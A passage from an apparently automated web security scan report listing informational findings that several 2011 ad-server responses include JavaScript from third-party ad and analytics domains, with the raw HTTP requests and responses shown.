Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4062
Date: Sun, 24 Apr 2011 12:29:24 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1348722381?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUMYF47AywqCVZa27Wxox.OACEyAZnZW8sdXNhLHQsMTMwMzY0ODE2NTQ3NixjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=45312426" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.10. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=47712248167954380&clkurl=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdA-DQnLzKB5z_4NCcvMoHnPxnsrvSuVyNySsYda6b2ziV-UrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAFAcBAgUCAAQAAAAAxiIVowAAAAA./cnd=!ERDMugiQmQMQxskKGAAg0ccBKEsxdSC_azKB5z9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBtxJ_fVK0Ta-3PIu0sQf734nLCtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwIHYeoa95Y661w-QRjmHXxPOHSEQ%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681232&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663232891&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663232897&frm=1&adk=2614322350&ga_vid=2063264456.1303663233&ga_sid=1303663233&ga_hid=753296769&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUT9qLjz2Zm9NiEFg3paXYGLcX2UIDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HhNc1nHJ.E0Jwyrk2cEDl2oBmfgea6QI3U8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8GZgmhzKwOjxhYNTJY2D4KPQfCEBxmx_AWM3A5G_DwPLCm4FRi4mB4dIzWBylKc8KAspZQeUYgXIP4HJKUupANiNuO7uFgPIMvpszGBg4gAlpJyNQMUPgLUYmIMVgwMggyMCgYAYWXFoAFmTJZGQFyrGEMLEysgEZ8rsYGbig6e86yCwGBgAWjZB.

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU7YHAgDFjVK1mMoJSeWtqvPKaAQcDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35Hktt1nHIRXtdwyvlNCMEp59rAAZVrA9r3HWifC9w.CffbOPVJ2Gnj0td.cucmXPraT86oxSl3QngxTrljCx7hlDv6VRCn3IwF7LjlbFtxyk1_6IlbrmMlbjlTXZxy024q4pSrLPNlYJocysDq8ISBUSePgeGj0H8gAMV7fgBjNQOTvw0DywtvBkYtJgaGS89gcZSmPCsIyGbEbW63EFCewXdzBgMDBzAh7WQEKmYIvMXIBKQYDBgZgNIKZmDBpQVgQZZMRlagHEsIEysjG5Ahv4uRgQue_kCGMQAA8RqSag--; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:40:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4048
Date: Sun, 24 Apr 2011 16:40:32 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=43512270?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUN3Xros9Ea4pMRnmQk3pok9iEDGBnZW8sdXNhLHQsMTMwMzY2MzIzMjcyOCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1adVQtYW1abVptWm01UHdBQUFFQXpNd2RBLURRbkx6S0I1el80TkNjdk1vSG5QeG5zcnZTdVZ5TnlTc1lkYTZiMnppVi1VclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUZBY0JBZ1VDQUFRQUFBQUF4aUlWb3dBQUFBQS4vY25kPSFFUkRNdWdpUW1RTVF4c2tLR0FBZzBjY0JLRXN4ZFNDX2F6S0I1ejlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJ0eEpfZlZLMFRhLTNQSXUwc1FmNzM0bkxDdGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDWk1BQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0d0lIWWVvYTk1WTY2MXctUVJqbUhYeFBPSFNFUSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1681222967" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.11. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=23216307838447390&clkurl=http://ib.adnxs.com/click/KVyPwvUo3D8pXI_C9SjcPwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1PyPD10Szk0Y9SsYda6b2ziWNP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAQRABAgUCAAQAAAAAByIdNAAAAAA./cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBw2WRjD-0TYabOc7ilQe2lLnTAdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqty_kivWyoJD_Hr1F2kWXBBBlx7Kqg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383920&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658383931&frm=1&adk=2614322350&ga_vid=22955387.1303658384&ga_sid=1303658384&ga_hid=456012454&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUI2s0JMGhZPIDYO0t7dlEyAtu1iADA3gBY2BgEGBg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhJ02VK4NKPcdKOcCk2s_uXMTLn3tJ2fU4pQ7IbwYp9yxBY9wyh39KohTbsYCdtxytq045aY_9MQt17ESt5ypLk65aTcVccpVlvkyME0OZWB1eMLAqJPHwPBR6D8QgMI6P4CxmoHJ34aB5YU3A6MWEwPDpWewsE5TnhUElLOCyjEC5R7A5ZSk1IFsRtx2dgsB5Rl8N2cwMHAAI3YnI1AxQ.AtRiYgxWDAyMDLwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZ2OHpAWQYAwD8zXas

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUwDPqfRB64ddpuy3kH4pbsq_jrkkDA3gBY2BgEGRg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhPsH3HJ22lC5NqC.70B9LjB97Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o19x.qF9xgJ2nPpm2LbilJv.0BO3XMdK3HKmujjlpt1UxClXWebLwDQ5lIHV4QkDo04eA8NHof9AAIqH_ADGagYmfxsGlhfeDIxaTAwMl57BwjpNeVYQUM4KKscIlHsAl1OSUgeyGXHb2S0ElGfw3ZzBwMABjPSdjEDFDIG3GJmAFIMBIwMfA4OCGVhwaQFYkCWTkRUoxxLCxMrIBmTI72JkYIenFZBhDABLSH3T; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 15:19:43 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4063
Date: Sun, 24 Apr 2011 15:19:42 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1582420280?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUg86d4or0xoouEvKfkkujbJtTkRVnZW8sdXNhLHQsMTMwMzY1ODM4MzM0NCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0tWeVB3dlVvM0Q4cFhJX0M5U2pjUHdBQUFFQXpNd2RBLXlFMldEaUo5VF83SVRaWU9JbjFQeVBEMTBTemswWTlTc1lkYTZiMnppV05QN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQVFSQUJBZ1VDQUFRQUFBQUFCeUlkTkFBQUFBQS4vY25kPSFyeEZHRmdpUW1RTVF4c2tLR0FBZzBjY0JLRXN4XzVUeXZEaUo5VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJ3MldSakQtMFRZYWJPYzdpbFFlMmxMblRBZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXJnRHdBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0eV9raXZXeW9KRF9IcjFGMmtXWEJCQmx4N0txZyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=674985428" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

24.12. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.15

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.15;sz=160x600;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.43369&rtbip=63.251.90.149&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKKgXMMvbHjozaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwQgcI1sUHEPcBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloGnUEsIU_gAHPk_nrBpABhKsHoAEBqAGmswewAQI&redirecturl2=;ord=43369? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303665997&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647997762&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303647997767&frm=1&adk=2614322350&ga_vid=1901204360.1303647998&ga_sid=1303647998&ga_hid=1446633403&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 12:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7206

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Apr 21 18:16:06 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.13. http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3016.158901.DATAXU/B5398270.22

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUmFaSHdZazJtfEVYXzEwMjM0NzcyMDZ8NDY3MTU4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAkQAN6vYK5X_NOLUzcqM_ssWL-1bQiOIurQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZKak0yUU5jSw&ciu=MFJhWkh3WWsybQ&reqid=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=467&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 15:30:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6373

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Mar 28 18:52:11 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

24.14. http://ad.doubleclick.net/adi/N3285.turn/B2343920.7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.turn/B2343920.7

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N3285.turn/B2343920.7;sz=160x600;ord=8440323269241723068?;click=http://r.turn.com/r/tpclick/id/vNidbEsNInUS2QkABQIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/; HTTP/1.1
